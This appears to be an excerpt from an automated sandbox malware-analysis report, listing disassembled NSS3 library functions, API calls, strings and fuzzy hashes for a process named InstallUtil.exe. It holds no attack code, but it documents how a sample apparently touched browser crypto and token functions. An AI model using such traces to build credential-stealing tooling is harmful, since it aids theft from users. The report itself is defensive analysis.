                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memsetsqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                  • API String ID: 984749767-598938438
                                                                                                                  • Opcode ID: 449d327540db05946f480b7fb73983ddcb27ca3188f0ec20e000dd797afabea1
                                                                                                                  • Instruction ID: e0088432a0deac72b63c3e0b934e34561f06952f3f2e24db84564470e9616feb
                                                                                                                  • Opcode Fuzzy Hash: 449d327540db05946f480b7fb73983ddcb27ca3188f0ec20e000dd797afabea1
                                                                                                                  • Instruction Fuzzy Hash: DAB1E1B0E052199BCB18CF9DC885AFEB7B2BF49304F14442AE815B7B41D3749942CBA9
                                                                                                                  APIs
                                                                                                                  • sqlite3_log.NSS3(00000015,bind on a busy prepared statement: [%s],?), ref: 6C6D24EC
                                                                                                                  • sqlite3_log.NSS3(00000015,API called with NULL prepared statement,?,?,?,?,?,6C6D2315), ref: 6C6D254F
                                                                                                                  • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000151C9,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,6C6D2315), ref: 6C6D256C
                                                                                                                  Strings
                                                                                                                  • API called with finalized prepared statement, xrefs: 6C6D2543, 6C6D254D
                                                                                                                  • bind on a busy prepared statement: [%s], xrefs: 6C6D24E6
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6D24F4, 6C6D2557
                                                                                                                  • API called with NULL prepared statement, xrefs: 6C6D253C
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C6D2566
                                                                                                                  • misuse, xrefs: 6C6D2561
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
                                                                                                                  • API String ID: 632333372-2222229625
                                                                                                                  • Opcode ID: 04065a766cf207fcdb72a1b276f2a489cde16aaa195391d31063cd450b69fadc
                                                                                                                  • Instruction ID: dd2f39f3f8d65eab8905563767501c52befdafb9a7b7622b3ac886c3e09302f7
                                                                                                                  • Opcode Fuzzy Hash: 04065a766cf207fcdb72a1b276f2a489cde16aaa195391d31063cd450b69fadc
                                                                                                                  • Instruction Fuzzy Hash: 0D41F3717006008BE7248F19E9A8BA673B6BF8631AF16493CE8054BB40DB36FC15C799
                                                                                                                  APIs
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C7AA4A6
                                                                                                                    • Part of subcall function 6C7B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B08B4
                                                                                                                  • PORT_Alloc_Util.NSS3(?), ref: 6C7AA4EC
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • memcpy.VCRUNTIME140(-00000006,?,?), ref: 6C7AA527
                                                                                                                  • memcmp.VCRUNTIME140(00000006,?,?), ref: 6C7AA56D
                                                                                                                  • memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6C7AA583
                                                                                                                  • PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C7AA596
                                                                                                                  • free.MOZGLUE(?), ref: 6C7AA5A4
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7AA5B6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
                                                                                                                  • String ID: ^jvl
                                                                                                                  • API String ID: 3906949479-1924602488
                                                                                                                  • Opcode ID: 9d812c2b89c4e43a05eab37e1e686be5ba3e20fcf49ed37ad8214fc888441924
                                                                                                                  • Instruction ID: 8c526d3283d4789c70af79c02f65ed4ab6ef2eedc4ef9f10fc815185eff04aa3
                                                                                                                  • Opcode Fuzzy Hash: 9d812c2b89c4e43a05eab37e1e686be5ba3e20fcf49ed37ad8214fc888441924
                                                                                                                  • Instruction Fuzzy Hash: 5F412A71A013429FDB10CFD9CD44B9ABBB1BF40318F18C568D8695BB42E731E91ACBA1
                                                                                                                  APIs
                                                                                                                  • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C750F62
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C750F84
                                                                                                                    • Part of subcall function 6C7AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8818D0,?), ref: 6C7AB095
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,6C76F59B,6C87890C,?), ref: 6C750FA8
                                                                                                                  • PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C750FC1
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C750FDB
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C750FEF
                                                                                                                  • PL_FreeArenaPool.NSS3(?), ref: 6C751001
                                                                                                                  • PL_FinishArenaPool.NSS3(?), ref: 6C751009
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
                                                                                                                  • String ID: security
                                                                                                                  • API String ID: 2061345354-3315324353
                                                                                                                  • Opcode ID: d9a1a14095f7a4e79844136a7e2e2d747fefa639622bf73c6ffc6e12e6a9b640
                                                                                                                  • Instruction ID: 2ec566b6a9b93738702b4628df73022274967d820d99d8c28173bd5e645a2fd3
                                                                                                                  • Opcode Fuzzy Hash: d9a1a14095f7a4e79844136a7e2e2d747fefa639622bf73c6ffc6e12e6a9b640
                                                                                                                  • Instruction Fuzzy Hash: 2A2128B1904204ABE7109F25DE44AAFB7B4EF4525CF048928FC18A7701FB31E659CBE2
                                                                                                                  APIs
                                                                                                                  • SECITEM_ArenaDupItem_Util.NSS3(?,6C757D8F,6C757D8F,?,?), ref: 6C756DC8
                                                                                                                    • Part of subcall function 6C7AFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C7AFE08
                                                                                                                    • Part of subcall function 6C7AFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C7AFE1D
                                                                                                                    • Part of subcall function 6C7AFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C7AFE62
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C757D8F,?,?), ref: 6C756DD5
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C878FA0,00000000,?,?,?,?,6C757D8F,?,?), ref: 6C756DF7
                                                                                                                    • Part of subcall function 6C7AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8818D0,?), ref: 6C7AB095
                                                                                                                  • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C756E35
                                                                                                                    • Part of subcall function 6C7AFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C7AFE29
                                                                                                                    • Part of subcall function 6C7AFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C7AFE3D
                                                                                                                    • Part of subcall function 6C7AFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C7AFE6F
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C756E4C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B116E
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C878FE0,00000000), ref: 6C756E82
                                                                                                                    • Part of subcall function 6C756AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C75B21D,00000000,00000000,6C75B219,?,6C756BFB,00000000,?,00000000,00000000,?,?,?,6C75B21D), ref: 6C756B01
                                                                                                                    • Part of subcall function 6C756AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C756B8A
                                                                                                                  • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C756F1E
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C756F35
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C878FE0,00000000), ref: 6C756F6B
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,6C757D8F,?,?), ref: 6C756FE1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 587344769-0
                                                                                                                  • Opcode ID: b49c5e996120466acf95b2b518c685c78ec3f8716c6869fcc33135c133e25793
                                                                                                                  • Instruction ID: db6deead83ca447826c450e4064c0c947940f91ebd9480fafd6de6c0b591f2c2
                                                                                                                  • Opcode Fuzzy Hash: b49c5e996120466acf95b2b518c685c78ec3f8716c6869fcc33135c133e25793
                                                                                                                  • Instruction Fuzzy Hash: 6871A371E102469FEB00CF55CE44BAABBA4FF54308F554229E808D7B51FB71EAA5CB90
                                                                                                                  APIs
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C791057
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C791085
                                                                                                                  • PK11_GetAllTokens.NSS3 ref: 6C7910B1
                                                                                                                  • free.MOZGLUE(?), ref: 6C791107
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C791172
                                                                                                                  • free.MOZGLUE(?), ref: 6C791182
                                                                                                                  • free.MOZGLUE(?), ref: 6C7911A6
                                                                                                                  • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C7911C5
                                                                                                                    • Part of subcall function 6C7952C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C76EAC5,00000001), ref: 6C7952DF
                                                                                                                    • Part of subcall function 6C7952C0: EnterCriticalSection.KERNEL32(?), ref: 6C7952F3
                                                                                                                    • Part of subcall function 6C7952C0: PR_Unlock.NSS3(?), ref: 6C795358
                                                                                                                  • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7911D3
                                                                                                                  • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7911F3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1549229083-0
                                                                                                                  • Opcode ID: 8c979ed04a9600a2710fa1d85b79534c375e94b09b19a78515a0d1b91ff5e2c9
                                                                                                                  • Instruction ID: 4c8eab9d1aa181ee54d277bdd7ced672b1076d7442035cc3e2ccff46d35acebe
                                                                                                                  • Opcode Fuzzy Hash: 8c979ed04a9600a2710fa1d85b79534c375e94b09b19a78515a0d1b91ff5e2c9
                                                                                                                  • Instruction Fuzzy Hash: 6E6187B4E003459BDB10DFA8EA45BAEB7B9AF04348F144134ED19AB741E731D954CB91
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE10
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE24
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,6C77D079,00000000,00000001), ref: 6C79AE5A
                                                                                                                  • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE6F
                                                                                                                  • free.MOZGLUE(85145F8B,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE7F
                                                                                                                  • TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEB1
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEC9
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEF1
                                                                                                                  • free.MOZGLUE(6C77CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C77CDBB,?), ref: 6C79AF0B
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AF30
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 161582014-0
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C77AB7F,?,00000000,?), ref: 6C774CB4
                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C,?,6C77AB7F,?,00000000,?), ref: 6C774CC8
                                                                                                                  • TlsGetValue.KERNEL32(?,6C77AB7F,?,00000000,?), ref: 6C774CE0
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,6C77AB7F,?,00000000,?), ref: 6C774CF4
                                                                                                                  • PL_HashTableLookup.NSS3(?,?,?,6C77AB7F,?,00000000,?), ref: 6C774D03
                                                                                                                  • PR_Unlock.NSS3(?,00000000,?), ref: 6C774D10
                                                                                                                    • Part of subcall function 6C7FDD70: TlsGetValue.KERNEL32 ref: 6C7FDD8C
                                                                                                                    • Part of subcall function 6C7FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7FDDB4
                                                                                                                  • PR_Now.NSS3(?,00000000,?), ref: 6C774D26
                                                                                                                    • Part of subcall function 6C819DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C860A27), ref: 6C819DC6
                                                                                                                    • Part of subcall function 6C819DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C860A27), ref: 6C819DD1
                                                                                                                    • Part of subcall function 6C819DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C819DED
                                                                                                                  • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C774D98
                                                                                                                  • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C774DDA
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C774E02
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4032354334-0
                                                                                                                  APIs
                                                                                                                  • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C752CDA,?,00000000), ref: 6C752E1E
                                                                                                                    • Part of subcall function 6C7AFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C759003,?), ref: 6C7AFD91
                                                                                                                    • Part of subcall function 6C7AFD80: PORT_Alloc_Util.NSS3(A4686C7B,?), ref: 6C7AFDA2
                                                                                                                    • Part of subcall function 6C7AFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C7B,?,?), ref: 6C7AFDC4
                                                                                                                  • SECITEM_DupItem_Util.NSS3(?), ref: 6C752E33
                                                                                                                    • Part of subcall function 6C7AFD80: free.MOZGLUE(00000000,?,?), ref: 6C7AFDD1
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C752E4E
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C752E5E
                                                                                                                  • PL_HashTableLookup.NSS3(?), ref: 6C752E71
                                                                                                                  • PL_HashTableRemove.NSS3(?), ref: 6C752E84
                                                                                                                  • PL_HashTableAdd.NSS3(?,00000000), ref: 6C752E96
                                                                                                                  • PR_Unlock.NSS3 ref: 6C752EA9
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C752EB6
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C752EC5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3332421221-0
                                                                                                                  APIs
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C6DB999), ref: 6C6DCFF3
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C6DB999), ref: 6C6DD02B
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C6DB999), ref: 6C6DD041
                                                                                                                  • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C6DB999), ref: 6C82972B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                  • API String ID: 491875419-598938438
                                                                                                                  APIs
                                                                                                                  • sqlite3_release_memory.NSS3(PR_Select(),PR_Poll()), ref: 6C86269F
                                                                                                                  • calloc.MOZGLUE(00000014,00000008), ref: 6C8626E0
                                                                                                                  • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C8626F4
                                                                                                                  • PR_Sleep.NSS3(?), ref: 6C862710
                                                                                                                    • Part of subcall function 6C86C2A0: PR_IntervalNow.NSS3 ref: 6C86C2BE
                                                                                                                    • Part of subcall function 6C86C2A0: PR_NewCondVar.NSS3 ref: 6C86C2CC
                                                                                                                    • Part of subcall function 6C86C2A0: EnterCriticalSection.KERNEL32(?), ref: 6C86C2E8
                                                                                                                    • Part of subcall function 6C86C2A0: PR_IntervalNow.NSS3 ref: 6C86C2F7
                                                                                                                    • Part of subcall function 6C86C2A0: _PR_MD_UNLOCK.NSS3(?), ref: 6C86C378
                                                                                                                    • Part of subcall function 6C86C2A0: DeleteCriticalSection.KERNEL32(?), ref: 6C86C390
                                                                                                                    • Part of subcall function 6C86C2A0: free.MOZGLUE(?), ref: 6C86C397
                                                                                                                    • Part of subcall function 6C8628A0: realloc.MOZGLUE(?,000000A8), ref: 6C8628EB
                                                                                                                    • Part of subcall function 6C8628A0: memset.VCRUNTIME140(-FFFFFAC0,00000000,000000A0), ref: 6C86290A
                                                                                                                  • PR_SetError.NSS3(FFFFE891,00000000), ref: 6C86287D
                                                                                                                  • free.MOZGLUE(?), ref: 6C86288B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalErrorIntervalSectionfree$CondDeleteEnterSleepcallocmemsetreallocsqlite3_release_memory
                                                                                                                  • String ID: PR_Poll()$PR_Select()
                                                                                                                  • API String ID: 3069664790-3034026096
                                                                                                                  APIs
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C7B536F,00000022,?,?,00000000,?), ref: 6C7B4E70
                                                                                                                  • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C7B4F28
                                                                                                                  • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C7B4F8E
                                                                                                                  • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C7B4FAE
                                                                                                                  • free.MOZGLUE(?), ref: 6C7B4FC8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
